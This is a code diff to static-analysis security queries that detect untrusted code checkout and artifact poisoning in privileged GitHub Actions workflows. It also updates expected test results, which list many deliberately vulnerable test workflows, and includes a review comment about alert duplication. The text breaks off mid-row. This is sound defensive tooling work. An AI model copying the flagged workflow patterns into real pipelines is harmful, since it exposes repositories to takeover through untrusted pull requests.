@@ -16,16 +16,17 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from LocalJob j, MutableRefCheckoutStep checkout, ControlCheck check +from LocalJob job, MutableRefCheckoutStep checkout, ControlCheck check, Event event where - j.getAStep() = checkout and + job.getAStep() = checkout and // there are no evidences that the checked-out gets executed not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and + inPrivilegedContext(checkout, event) and + event = job.getATriggerEvent() and // the mutable checkout step is protected by an Insufficient access check - check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout") and - not check.protects(checkout, j.getATriggerEvent(), "untrusted-checkout-toctou") + check.protects(checkout, event, "untrusted-checkout") and + not check.protects(checkout, event, "untrusted-checkout-toctou") select checkout, "Insufficient protection against execution of untrusted code on a privileged workflow on step $@.", check, check.toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index 82c6f936c51f..e4ab90e5fc2e 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql 
@@ -16,10 +16,13 @@ import codeql.actions.security.ArtifactPoisoningQuery import ArtifactPoisoningFlow::PathGraph import codeql.actions.security.ControlChecks -from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink +from ArtifactPoisoningFlow::PathNode source, ArtifactPoisoningFlow::PathNode sink, Event event where ArtifactPoisoningFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") + ) select sink.getNode(), source, sink, "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, sink.getNode().toString() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index a50c47a97935..5f676052ef68 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -16,8 +16,9 @@ import actions import codeql.actions.security.PoisonableSteps import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download, KnownVulnerableAction vulnerable_action +from UsesStep download, KnownVulnerableAction vulnerable_action, Event event where + event = download.getEnclosingJob().getATriggerEvent() and vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( 
@@ -28,7 +29,7 @@ where // exists a poisonable upload artifact in the same workflow exists(UsesStep checkout, PoisonableStep poison, UsesStep upload | download.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and - download.getEnclosingJob().isPrivilegedExternallyTriggerable() and + download.getEnclosingJob().isPrivilegedExternallyTriggerable(event) and checkout.getCallee() = "actions/checkout" and checkout.getAFollowingStep() = poison and poison.getAFollowingStep() = upload and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 31a4cdf94e54..f9f951917955 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -25,8 +25,7 @@ where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(step, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and @@ -36,12 +35,13 @@ where check instanceof AssociationCheck or check instanceof PermissionCheck ) and - check.dominates(checkout) and - date_check.dominates(checkout) + check.dominates(step) and + date_check.dominates(step) ) or // not issue_comment triggered workflows not event.getName() = "issue_comment" and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) + not exists(ControlCheck check | check.protects(step, event, "untrusted-checkout")) ) -select step, checkout, step, "Execution of untrusted code on a privileged workflow." +select step, checkout, step, "Execution of untrusted code on a privileged workflow. $@", event, + event.getLocation().getFile().toString() 
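Review bot: The rewritten `select` in UntrustedCheckoutCritical.ql adds `event` as a result column, so a step in a workflow with several privileged triggers now yields one alert per trigger instead of one per step — the updated UntrustedCheckoutCritical.expected in this commit shows level0.yml:107 and level0.yml:133 each reported three times (issues, issue_comment, pull_request_target). If one alert per step is the intent, the trigger names could be folded into the message with an aggregate such as `concat(Event e | inPrivilegedContext(step, e) | e.getName(), ", ")` while keeping `step` and `checkout` as the only location columns; if the fan-out is intended, a one-line comment above `select` saying so would help. Note also that the privileged-context and dominance checks now apply to `step` rather than `checkout`, which is the more precise sink but changes which existing results survive. The enclosing `where` clause starts outside the hunk.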
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index bc6f0e36e56e..e130ba5dbb8a 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -23,8 +23,7 @@ where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context - inPrivilegedContext(checkout) and - event = checkout.getEnclosingJob().getATriggerEvent() and + inPrivilegedContext(checkout, event) and ( // issue_comment: check for date comparison checks and actor/access control checks event.getName() = "issue_comment" and diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql index 8cc8e75c2af3..66c68e882e22 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutMedium.ql @@ -15,8 +15,6 @@ import actions import codeql.actions.security.UntrustedCheckoutQuery -import codeql.actions.security.PoisonableSteps -import codeql.actions.security.ControlChecks from PRHeadCheckoutStep checkout where diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 609b09fdfef4..3ad4e6915d23 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -438,7 +438,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index afae24540787..006f365ae05c 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -246,37 +246,42 @@ edges | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | | .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | #select -| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
| -| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | -| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | +| .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/poc2.yml:52:9:58:24 | Run Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | +| .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | .github/workflows/pr-workflow.yml:216:9:222:6 | Uses Step | .github/workflows/pr-workflow.yml:222:9:227:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | .github/workflows/pr-workflow.yml:250:9:256:6 | Uses Step | .github/workflows/pr-workflow.yml:256:9:261:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | .github/workflows/pr-workflow.yml:284:9:290:6 | Uses Step | .github/workflows/pr-workflow.yml:290:9:295:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:391:9:395:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:395:9:404:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:404:9:414:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | +| .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | +| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | +| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | +| .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | +| .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | +| .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:61:7:67:4 | Run Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:67:7:73:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | .github/workflows/untrusted_checkout4.yml:55:7:61:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:73:7:79:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout4.yml:4:3:4:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/untrusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout.yml | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step 